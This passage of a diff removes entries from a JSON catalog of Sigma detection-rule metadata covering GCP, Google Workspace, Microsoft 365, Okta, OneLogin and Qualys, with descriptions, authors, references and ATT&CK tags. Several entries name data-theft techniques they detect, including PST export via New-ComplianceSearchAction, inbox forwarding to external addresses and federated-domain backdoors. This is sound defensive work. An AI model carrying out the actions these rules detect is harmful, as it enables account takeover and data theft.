modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_sql_database_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", - "value": "Google Cloud SQL Database Modified or Deleted" - }, - { - "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "VPN Tunnel being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", - "value": "Google Cloud VPN Tunnel Modified or Deleted" - }, - { - "description": "Detects when an an application is removed from Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/26", - "falsepositive": [ - "Application being removed may be performed by a System Administrator." 
- ], - "filename": "gworkspace_application_removed.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", - "value": "Google Workspace Application Removed" - }, - { - "description": "Detects when an API access service account is granted domain authority.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_granted_domain_api_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", - "value": "Google Workspace Granted Domain API Access" - }, - { - "description": "Detects when multi-factor authentication (MFA) is disabled.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/26", - "falsepositive": [ - "MFA may be disabled and performed by a system administrator." 
- ], - "filename": "gworkspace_mfa_disabled.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", - "value": "Google Workspace MFA Disabled" - }, - { - "description": "Detects when an a role is modified or deleted in Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_role_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", - "value": "Google Workspace Role Modified or Deleted" - }, - { - "description": "Detects when an a role privilege is deleted in Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_role_privilege_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - 
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", - "value": "Google Workspace Role Privilege Deleted" - }, - { - "description": "Detects when an Google Workspace user is granted admin privileges.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/23", - "falsepositive": [ - "Google Workspace admin role privileges, may be modified by system administrators." - ], - "filename": "gworkspace_user_granted_admin_privileges.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", - "value": "Google Workspace User Granted Admin Privileges" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_activity_by_terminated_user.yml", - "level": "medium", - "logsource.category": "No 
established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", - "value": "Activity Performed by Terminated User" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "User using a VPN or Proxy" - ], - "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", - "value": "Activity from Anonymous IP Addresses" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_activity_from_infrequent_country.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - 
"https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "0f2468a2-5055-4212-a368-7321198ee706", - "value": "Activity from Infrequent Country" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", - "value": "Data Exfiltration to Unsanctioned Apps" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_from_susp_ip_addresses.yml", - "level": "medium", - "logsource.category": "No established 
category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", - "value": "Activity from Suspicious IP Addresses" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2020/07/06", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_impossible_travel_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", - "value": "Microsoft 365 - Impossible Travel Activity" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_logon_from_risky_ip_address.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - 
"https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", - "value": "Logon from a Risky IP Address" - }, - { - "description": "Alert for the addition of a new federated domain.", - "meta": { - "author": "@ionsor", - "creation_date": "2022/02/08", - "falsepositive": [ - "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." - ], - "filename": "microsoft365_new_federated_domain_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://www.sygnia.co/golden-saml-advisory", - "https://o365blog.com/post/aadbackdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.003" - ] - }, - "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", - "value": "New Federated Domain Added" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_potential_ransomware_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - 
"refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", - "value": "Microsoft 365 - Potential Ransomware Activity" - }, - { - "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", - "meta": { - "author": "Sorina Ionescu", - "creation_date": "2022/02/08", - "falsepositive": [ - "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." - ], - "filename": "microsoft365_pst_export_alert.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", - "value": "PST Export Alert Using eDiscovery Alert" - }, - { - "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", - "meta": { - "author": "Nikita Khalimonenkov", - "creation_date": "2022/11/17", - "falsepositive": [ - "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." 
- ], - "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "6897cd82-6664-11ed-9022-0242ac120002", - "value": "PST Export Alert Using New-ComplianceSearchAction" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_susp_inbox_forwarding.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", - "value": "Suspicious Inbox Forwarding" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", - "level": "medium", 
- "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", - "value": "Suspicious OAuth App File Download Activities" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_unusual_volume_of_file_deletion.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", - "value": "Microsoft 365 - Unusual Volume of File Deletion" - }, - { - "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_user_restricted_from_sending_email.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - 
"https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1199" - ] - }, - "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", - "value": "Microsoft 365 - User Restricted from Sending Email" - }, - { - "description": "Detects when an the Administrator role is assigned to an user or group.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Administrator roles could be assigned to users or group by other admin users." - ], - "filename": "okta_admin_role_assigned_to_user_or_group.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "413d4a81-6c98-4479-9863-014785fd579c", - "value": "Okta Admin Role Assigned to an User or Group" - }, - { - "description": "Detects when a API token is created", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_api_token_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", - "value": "Okta API Token Created" - }, - { - "description": "Detects when a API 
Token is revoked.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_api_token_revoked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", - "value": "Okta API Token Revoked" - }, - { - "description": "Detects when an application is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_application_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", - "value": "Okta Application Modified or Deleted" - }, - { - "description": "Detects when an application Sign-on Policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", - "value": "Okta Application Sign-On Policy Modified or Deleted" - }, - { - "description": "Detects when an attempt at deactivating or resetting MFA.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/21", - "falsepositive": [ - "If a MFA reset or deactivated was performed by a system administrator." - ], - "filename": "okta_mfa_reset_or_deactivated.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", - "value": "Okta MFA Reset or Deactivated" - }, - { - "description": "Detects when an Network Zone is Deactivated or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_network_zone_deactivated_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", - "value": "Okta Network Zone Deactivated or Deleted" - }, - { - "description": "Detects when an Okta policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", 
- "creation_date": "2021/09/12", - "falsepositive": [ - "Okta Policies being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "okta_policy_modified_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "1667a172-ed4c-463c-9969-efd92195319a", - "value": "Okta Policy Modified or Deleted" - }, - { - "description": "Detects when an Policy Rule is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_policy_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", - "value": "Okta Policy Rule Modified or Deleted" - }, - { - "description": "Detects when an security threat is detected in Okta.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_security_threat_detected.yml", - "level": "medium", - 
"logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" - ], - "tags": "No established tags" - }, - "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", - "value": "Okta Security Threat Detected" - }, - { - "description": "Detects when unauthorized access to app occurs.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "User might of believe that they had access." - ], - "filename": "okta_unauthorized_access_to_app.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", - "value": "Okta Unauthorized Access to App" - }, - { - "description": "Detects when an user account is locked out.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_user_account_locked_out.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": 
"14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", - "value": "Okta User Account Locked Out" - }, - { - "description": "Detects when an user assumed another user account.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "onelogin_assumed_another_user.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "onelogin", - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", - "value": "OneLogin User Assumed Another User" - }, - { - "description": "Detects when an user account is locked or suspended.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "System may lock or suspend user accounts." - ], - "filename": "onelogin_user_account_locked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "onelogin", - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", - "value": "OneLogin User Account Locked" - }, - { - "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "default_credentials_usage.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "qualys", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" - ], - "tags": "No established tags" - }, - "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", - "value": "Default Credentials Usage" - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
